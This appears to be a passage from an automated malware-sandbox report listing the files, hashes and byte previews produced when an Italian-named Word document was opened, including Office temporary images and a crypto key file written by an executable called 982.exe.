C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\627D15E1.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
Size (bytes):	444
Entropy (8bit):	3.265073788282792
Encrypted:	false
MD5:	112C151F42DD66B8A46F37F347E857A7
SHA1:	DEEAE8A48A77538A8017FC290216D49A1A5BA691
SHA-256:	52927CD91023D2087AD4948D329A610141299FD4C7ADD640B20B7768BCBE5D55
SHA-512:	8BB2817888D787949E78A6D0999EDAE258881CD7F2DB7769133FA051D37A9D48A157212F0B3878B8D4A478FB53E5440832750C20E8D71013B9595AE0164FA890
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A.......m#..I.u@..u..f.....-.................'.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6BD64A8B.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
Size (bytes):	444
Entropy (8bit):	3.2970430492936575
Encrypted:	false
MD5:	051ADBA813F643CAE64B8FF6469A7D56
SHA1:	C353030EFCF4E0B19D793600D800F9477F69C4DE
SHA-256:	97E79F0722FB906EDDF8DACA1EACA4C0BF9775E998327404D90EE694AAE0D17A
SHA-512:	B50CBE27B002A21E4DFB69C02EA195C969531652B860038D632622C354A0689D7930298946A7ABBA0A76EB165FB255B7E401500FD41D6145C623DCE4DB2917F6
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A...`6...m#..I.u@..u..f.....-.................'.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7806EFD5.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
Size (bytes):	444
Entropy (8bit):	3.288034040284648
Encrypted:	false
MD5:	DB9047F2F57348CB9907BC18F0B7C38C
SHA1:	2E91277450E3B32CDEE0E9E3F62A83E942AC2B33
SHA-256:	8C64939224DF6801A92FD5B8272F31CFFBDB765795C6461951BCD0CA63483A1C
SHA-512:	AFD8C0F4FE96E74F1CB38E59C950CE191C0033D70B413AD3824041D0448C5DE45A4C766404A4757B35AFEC967EF03A8744D9CACEBB0797A80E71F9FC214221DD
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A.......m#..I.u@..u..fM....-.................'.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7CB5B986.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
Size (bytes):	462
Entropy (8bit):	3.190530479005839
Encrypted:	false
MD5:	8420A766419DA43853FE79DCCFC9740B
SHA1:	099D841F94B6F38F52720E6C1E84A6A3735AED96
SHA-256:	B9D8BD38B39487C173786E908F5CAB10FE2C81DC6E6E91F98CB1EBD13BA943C6
SHA-512:	93359F16A4FB5842F339DB423A221D11B6854CE99DD4F1361AF2DDE9BFFD5B5A5EBA7473B2C667E3BF9E7C2BDE20745B1433BF86D61571296B4AEF42C3C98B8D
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n.........&.'.-v@.0v>.f.....-.................'...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F762AB8.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
Size (bytes):	462
Entropy (8bit):	3.184567519044446
Encrypted:	false
MD5:	F9E083929EB80449F05AADAD41E946AF
SHA1:	AC9252071CD9A4DF1972E6181D04EE2AB206D2B0
SHA-256:	C64132607E8E7FEF05CA767EEE8F14542F5444F4F66C4CB0DD21FA7941C3908E
SHA-512:	B7D5AA6A6F4CF43836EC7473F04B43FF2C3BFB08D94B79D50CE0145DD9D674055F4AC6DD0ACCAF1EC0F814E11047CBD8B5E75783181572414B441CE8A4FC19C4
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n...@.....&.'.-v@.0v<.f.....-.................'...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\887ADA1B.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
Size (bytes):	444
Entropy (8bit):	3.282583782676525
Encrypted:	false
MD5:	79007329A911130DC005DC316CC736F9
SHA1:	88453679F805B23150F0EE1750D45B34473F7AB4
SHA-256:	FF0E5C38AC42132F6F43A81434EDA10D88467ECBF832D9DC882441E9BDBA33CD
SHA-512:	1270E93AA7330F0A4C80385B98DCC2DF7624535272FD7E15547E2662C019E7B55E0391DAE35B17B2C38A73917760967687E4324398C0CBF4DA292B771978EEC9
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A.......m#..I.u@..u..f.....-.................'.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8FF0CB08.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
Size (bytes):	462
Entropy (8bit):	3.1928688241605054
Encrypted:	false
MD5:	6CF15EF7593B3BE31ABEB605865B7545
SHA1:	C27DE85EA247CA69EC7834581E677260CE6CAFBA
SHA-256:	91F230E1B45F6CDA65EEF13B9266842C564EF0BE40C468BCC9E61FAC74E73A70
SHA-512:	92986B9BBE796BA0F98301FEEE9FFC12ADE08E80E89374E91CCC67E329A2CA08E657811A69115983D4B25A8A1622603337D4C21F455817DE9002C85CD8C8F770
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n...@.....&.'.-v@.0v#.f ....-.................'...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BEDDBFC.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
Size (bytes):	462
Entropy (8bit):	3.1759695423295566
Encrypted:	false
MD5:	84CB031A68B621ED84D8217A19EB8B31
SHA1:	391310274033A04F1490E0B2E804C59B98D59927
SHA-256:	ED6C187ABDA95ABC7DC7A92D827ABB5D69BB3D9654B0E6F8A00F9448ED877A2E
SHA-512:	4D56D1D61EE712E1515C1E4A6ED94864155741B7AD24108DC8A8E21875BB7543A9C6E7842E32779B4098CA338C32F66DEF05582F7EA09A21BD69C1BBD080A6DB
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n.........&.'.-v@.0v`.f.....-.................'...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A1A3FD3E.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
Size (bytes):	462
Entropy (8bit):	3.1901737754638897
Encrypted:	false
MD5:	2C7909FA4FBD0D988F5AAC92795E4142
SHA1:	D533B95896BFE834E6BBB50695B7C94A009BE583
SHA-256:	9B281E54D5A553777F545BCDCA198A89FE119115AAA05428121E793B7FB2A22E
SHA-512:	6EFBEA57BAF2196D019C1BD46B26674900CE598F8F4B9CDC30B232C53E5D1931A8C7D08DD60CF33C251C339270BEF6C2FD34F67D7253017FFCE61DFE920A14C6
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n...HH....&.'.-v@.0v .f ....-.................'...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A3AE3E5F.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
Size (bytes):	444
Entropy (8bit):	3.292538544789153
Encrypted:	false
MD5:	25FB55E776C272194B1527A141A79C25
SHA1:	CDCCE4AE12506FBB6617A16ADE43796D1A9F9152
SHA-256:	C5C8D7ADD9ED6F3535CF4E8096CACEA6E23C073FFFBED04246D56F15AA86E8F8
SHA-512:	6D299069989CB000992F7FA09C457EB3413063420DFBF2575F3B3C0A725B3399F2E36CCE155DF9ECB3ACA79F4B2344E42B3C5AD28D320BE9C1E79786E3B035BF
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A.......m#..I.u@..u..f.....-.................'.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6BDC6D3.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
Size (bytes):	444
Entropy (8bit):	3.292538544789153
Encrypted:	false
MD5:	FD9D5258FC01B92B85F5F66BDE0C716E
SHA1:	7E94E86FAA295CF3C1A6E0D0B1C81F237567C058
SHA-256:	FCC097EB3BD4F8175B7A1F5F6D41995486EC625A68C9EAD7A7D38183FC4D0224
SHA-512:	979D75314B11194456556331F3646ACC21F647C1EC29EC485E8CF9559607DE61263DE032F814EA7A75D5BECC0D20815DEA304BE706F2CC3C67C2863B7B7F9113
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A...P....m#..I.u@..u..f.....-.................'.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AE8B38BD.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
Size (bytes):	444
Entropy (8bit):	3.280783407516915
Encrypted:	false
MD5:	F6FA31796FED0A0DC93FE6C39F1F7175
SHA1:	85478D0124CE4181A40298BA9F60D6E952849421
SHA-256:	1AF18D6158D16A0FA06AFDA1EB5ECEBAC9B8B72BF881CF323A573C28BEED9D8A
SHA-512:	501BBAD27C74E02FD3091AD1CF7B9D95EF513F9443A29564238B70977A69810EB5E2641735250993460351B49E17DAF02512F817EDAA58A6A8810CF80B097F0D
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A...p....m#..I.u@..u..f+....-.................'.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0C64E56.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
Size (bytes):	462
Entropy (8bit):	3.200681898780499
Encrypted:	false
MD5:	5CA7ED787FBF985F8332CA352925D1A4
SHA1:	1D80F7875FC737E650C47D1DB90B0EE0DCA72740
SHA-256:	81F293698612C3F38EE5EAA278FF29B3E8D180DCF3EE343F13CF66C823EDA192
SHA-512:	2FCF5E5769C436FA6E1B463373F0313A4CC232DFB3F972B64AF9C8C0B86472EE49342AC8FEDD6430324E37F9827A9BE345FB64868E163E7CB3B485CFD90F2EBB
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n.........&.'.-v@.0vU.f"....-.................'...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9FD7B59.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
Size (bytes):	444
Entropy (8bit):	3.288034040284648
Encrypted:	false
MD5:	0C6DB51E8E2E3C8B995A7E6736EC94ED
SHA1:	CF03B45CFCDAC281FA3C060B3DFFB12BB238CE0D
SHA-256:	653148B5E747C1BC657A0804EC8F05C0A521B3915881C36877C09EEBFE303FB6
SHA-512:	9DBB5DDF72ABEF17577DD02385D70B40E8071E8CB1D7A4A5710DCE78D2B9CF7C4DA8C4CCE241F82BE78776A8E449705E82AE4DE17CEE82D117D50F45C1BC162D
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A....<...m#..I.u@..u..fP....-.................'.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA46CC32.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
Size (bytes):	462
Entropy (8bit):	3.186201474676835
Encrypted:	false
MD5:	CD01AEBC62607A15B77B5894B635319D
SHA1:	FCE721C300F30BC6FECB36363DE9204D7C1745E6
SHA-256:	E79B6B20A5206ABA5FD06DD7E435C2107628606262B1EC21772BEEB217246D72
SHA-512:	23C2FE5832926623EF65AAE2B695B360727E39704F2818A96BA8149538EE0B66FE851FD31A1A5A9CF5C6AC8CA3B129CA7EDF7457C02DEDB0C9E5437CAF5599B7
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n........&.'.-v@.0vB.f.....-.................'...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3FA04D4.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
Size (bytes):	462
Entropy (8bit):	3.190530479005839
Encrypted:	false
MD5:	C0FE8A0070477766DF6C13946AC61B86
SHA1:	F74EF43E3FC2C185D43F9407BF13F8A793E045A0
SHA-256:	452E1F86F94FC7EEFF5936078DC3834BB14398CA415DC459CE87D79A9A2FA26B
SHA-512:	C1446CB37CA3E34F30F6FD2A940E3127B27CD67E89A2090BAC70D2CAB6783C6C1D109BBDA35F9A6CE197F853AC100BE3A681636BFE430B1976C0DF79EE31E288
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n.........&.'.-v@.0v5.f.....-.................'...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA52B6C5.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
Size (bytes):	444
Entropy (8bit):	3.2970430492936575
Encrypted:	false
MD5:	B059BE68FCD725D1BFD6900E89788BF0
SHA1:	E0168057480CF002E64708A88057E0AD2B08ED88
SHA-256:	ECC34300BA1403725C5696E2752464B3E3EA8C6A9CEFDEB389FDE10773016009
SHA-512:	712E2236F404008596FD4C0A57917BA029B6864E73F258972DA0ED498CC1F426FF6F7E5FA5FE0D8535A3A1F2650DE9EC8861B6D96FCCF0C274D65BDEA829F576
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A...p....m#..I.u@..u..f.....-.................'.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB3BCFCF.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
Size (bytes):	444
Entropy (8bit):	3.2897342373615936
Encrypted:	false
MD5:	4673D1968085F58970A07BDE8D011481
SHA1:	9C7688F8B3F608E1E5DC16D4626123296A2A7E85
SHA-256:	4F3B3C921E93243D367174E450CBA6DC0C3A886997FC131DDECF7492F7D20D8F
SHA-512:	036CEA29EF05AC5014D586D101E2BE83B536B3B16F196DA8722E385844C564A7305D5088C2331C6CF75BC57A97FE6E20131555F38E0C12FA45180F00CDAD845C
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A... ;...m#..I.u@..u..f.....-.................'.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD9ED7F1.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
Size (bytes):	444
Entropy (8bit):	3.288034040284648
Encrypted:	false
MD5:	1FC651314C344FFF2D2AD7595369214E
SHA1:	2EF4A99A71AA67C1ED7D80E1D876BFCBF57D93A0
SHA-256:	AC4FB89FD0183ACA0F6D727B2FAEF810F20F1ECC6CA89E3DBEBC0EA8471E59F6
SHA-512:	15F9B3CDF98B5AF36299AAB31170A5D0459DA89C4E5D83011B2D2162690FA28A09D0F55770ABDEAFA88B355AC657D5ED5528093E02FD4EBF7BE6F7A23200AB6C
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A.......m#..I.u@..u..f)....-.................'.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E0222F9A.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
Size (bytes):	462
Entropy (8bit):	3.183506425980218
Encrypted:	false
MD5:	2EA0D3B2666E5952B7C46876B5F1660B
SHA1:	00D95C3A0F903FE8F5BFEB06590C695AF4802759
SHA-256:	E854B3883D488B96384983B0A04231973A40FEE94875623280899339DE39C613
SHA-512:	9AAEBFBBC278B36A04137F84855443622872EAABAB1B10579F3D14FB277391C8E54C786C0A32EE79BDBCEDDFB4B24D4B2AEDB663509B31EB9EDC3A6943E1478B
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n.........&.'.-v@.0v;.f.....-.................'...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E442C602.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
Size (bytes):	462
Entropy (8bit):	3.200681898780499
Encrypted:	false
MD5:	AD419B96AB066E06EAC036B6065287A7
SHA1:	4E67301D21534C03A75B00FC0222AC6EFAD05EF8
SHA-256:	5610C333CCCF85ABFC3F4930C62FB0252F98A828B167E8A7120471AA25F059EB
SHA-512:	1F55163298D6E49D3CEA6A884FB91129B6AD05175ED08D2C138CD3148EE9117FB03A9B51308C8AB65566A8D234F8F1C13EC65C21863FB0C0447E2C1E0446ADD4
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n... .....&.'.-v@.0v~.f.....-.................'...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F1476E24.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
Size (bytes):	462
Entropy (8bit):	3.1958963691236155
Encrypted:	false
MD5:	66CAEB9BBC8EFDF4A9D4607D5BC82258
SHA1:	E0E761A19FAD9109CEC4A165C1839574959EAF95
SHA-256:	3C813E5385B439B7B9869B62EE117E19300FF92FDA5EED964D02487FAD9B5030
SHA-512:	91D82462DEAD4464F0EC6C6BF4F3A9F1767FEDC9822097D4F3D08D80DB3A176D8DCE4466C20DBF2835C872D9D28EFCDFBD018358898EECA5BCE6F0FDBDCE6540
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n...hF....&.'.-v@.0v`.f.....-.................'...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8C1B397.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
Size (bytes):	444
Entropy (8bit):	3.2787120459436183
Encrypted:	false
MD5:	EA2FA46444CB04DE0026E45F39C647E3
SHA1:	44B29CC391B0B6957093EA1989C093C05906D4AC
SHA-256:	B69B4F5228A0B7932BB3D017768B92429FE318DB5E8EDAD3D26FBC30CB7FA9F7
SHA-512:	AF133041821E4EBAA8C8BF15598A6F2423EE57AE36BB35C1A1E724C399BAE37367F70E4D4FA74D08B8CEEE764DC41D4CAF82316C430CD6F60E4313FDC3F7B2E5
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A.......m#..I.u@..u..f.....-.................'.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA0AC26E.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
Size (bytes):	462
Entropy (8bit):	3.190530479005839
Encrypted:	false
MD5:	0D7996DF9763147D45FA25D78E8E35F5
SHA1:	B51F70E30C5C74CC08629EB2F375C15BBA3C2251
SHA-256:	7400B04CFD802B7DECC0F3B941EF2CAF592BD81376097F5256141C1A67ED9320
SHA-512:	F536F325CF80DE53209799C8DBF65E61B1B3AC5341D43920ABA6F0D3F59B1FF5975ADEEF8262E6FC613AC3EA80D5D219629481A83CD38EEA87F7EC0DD4989036
Malicious:	false
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n...`.....&.'.-v@.0v7.f.....-.................'...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B2D8E064-4C82-489B-9E64-A1B1ADE949CA}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Word8.0\MSForms.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	182128
Entropy (8bit):	4.340855849014704
Encrypted:	false
MD5:	536E0FF11E2CC49AF44BA87257D8CDCE
SHA1:	02DD0947598FA9EEBDCAF5617351610435B33DD0
SHA-256:	2EAF515FC7AF0A73EAB80C57D880E0028B4AC187AAA290A70457532A5DF60940
SHA-512:	C03ED0323B19EBF5DA2E49042AFA971BCB927D52FBF878FD7523E037EC5B8A9455C97F0EB9A9E42169B513ED75D4F5415FFE658DB76924679318A974E514A38C
Malicious:	false
Preview:	MSFT................Q...............................=#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0......*..\+...+..$,...,...,..P-...-......\|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......l...8..........................$................................................................................x...G..............T........................................... ...........................................................&!...........................................................................................N.

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312302014-279660585-3511680526-1004\4aacbf725e5908a192ccd61db75414d6_041d84af-7e76-450d-8340-55db3c73c359 Download File
Process:	C:\Users\user\982.exe
File Type:	data
Size (bytes):	2102
Entropy (8bit):	7.176598689928795
Encrypted:	false
MD5:	D098E1BFB9EA7F29AD8CFB93ED6D90A8
SHA1:	C893189C0A0540BE6E105675E679FEE8ECCB2F05
SHA-256:	087A78E04865A9A90EFFD6033E50FFA19B3566596C40C99962A3738C8CD9BA1D
SHA-512:	6815B12F41688AF8D728A8C4B7B65EEF9A252C0368B988E86F3F05C483956DB944ECA2F45C978EA851E4388843AB3AACC087F846625F0C20C2524070DEF56463
Malicious:	false
Preview:	....................\...................user.RSA1H.......?...........}...h8...B~k..!.R..<.HN:D...tW....5g.n.xLu5..tI. .q5e.. ........................z..O.......3q....M.q..m{\.....,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... ............C..M.Pl....b..E................... ......K..U.B...C1"..o............y......."....Io..,...e.+..x../.i..3t}/.D_.p.8R....2...k.#..?.;Dql5...'O.{..N64\^.....s;Z&.8/<oY4T...1....mw.-.._.3.F)...7.....u.4..}...&.L.x...\|.&..@.].(.=c.6.&x.b.b&l....{..U..r..h.t.V\|K..K......t.[.#...qm7...qC.&._.o...v......w6H..X56...A"D...L+._U[......r...XO7......"4.Ja.cz.4..>....99.W\|...._..Jr~Z..-"ZKX.:..wo..UU....7...b.c.T.GFM..J.=.....[.&\|.s..H..g\..n..3....VO'.O......WX@....#....R.R....>....{.. .H.....0?...rw...o..?h......8.ye..@p..............z..O.......3q....M.q..m{\.........E.x.p.o.r.t. .F.l.a.g....f...... ...T....=oZ!.-...\|...D...).1.S............. ....{..9..%j..Q]...x.H...}..y/j......N..%......f....@...4..Jy.^.Gt...

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Nuovo_documento_2019.09.20.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 12 10:48:02 2019, mtime=Mon Aug 12 10:48:02 2019, atime=Fri Sep 20 10:29:23 2019, length=238592, window=hide
Size (bytes):	2226
Entropy (8bit):	4.551273023282595
Encrypted:	false
MD5:	234F18866F9CA3536B02E3109C2D58F5
SHA1:	02074004BA25998464F686E980C0C1BCE2A95B03
SHA-256:	6A9AB04EFF4826C43B411A37360511FF4E35CB221A72CE7A77A7227A769B620D
SHA-512:	137515DC683B65C8618C1E4BE15B5A9CC7E10EBC10989EDE5C894B9A94FC895F78CAB6A1C83AD22438A121C700E128B39B213D0AC5CE1211196D2A93066EA030
Malicious:	false
Preview:	L..................F.... ...j....Q..j....Q...4E..o...............................P.O. .:i.....+00.../C:\...................t.1......H.>..Users.`.......:...H.>...Z...............6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1......O.^..user~1..B.......H.9.O.^.........................l.u.k.e.t.a.y.l.o.r.....z.1......O.^..Desktop.d.......H.9.O.^...&...............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....4O.[ .NUOVO_~1.DOC..j.......O.^.O.^....(....................N.u.o.v.o._.d.o.c.u.m.e.n.t.o._.2.0.1.9...0.9...2.0...d.o.c.......................-...8...[.............h.....C:\Users\..#...................\\813848\Users.user\Desktop\Nuovo_documento_2019.09.20.doc.5.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.u.o.v.o._.d.o.c.u.m.e.n.t.o._.2.0.1.9...0.9...2.0...d.o.c.........:..,.LB.)...Au...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.3.1.2.3.0.2.0.1.4.-.2.7.9.6.6.0.5.8.5.-.3.5.1.1.6.8.0.5.2.6.-.1.0.0.4

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	86
Entropy (8bit):	4.493255092405266
Encrypted:	false
MD5:	5E61C5A9137DC37593811391C419A91D
SHA1:	AEECD1E614F40C39C2B7BDCFB26E9214629BA26D
SHA-256:	14217EBAA31435E304D13CB8F27B28A5AD426876B3CA7AE21B9BD4DAA6CC8F31
SHA-512:	9F580FD296C60BA4758D8907EF7E402F4B875A260C3584596DBC21578FF5003909AA622B9B31CECBF963464CEC769B6C33B4E07EBF9ABC9DFC6A149129BCBD1F
Malicious:	false
Preview:	[doc]..Nuovo_documento_2019.09.20.LNK=0..[folders]..Nuovo_documento_2019.09.20.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	162
Entropy (8bit):	2.206542077975962
Encrypted:	false
MD5:	D00AF25948EE6C7F7AB78C2C16AACD3B
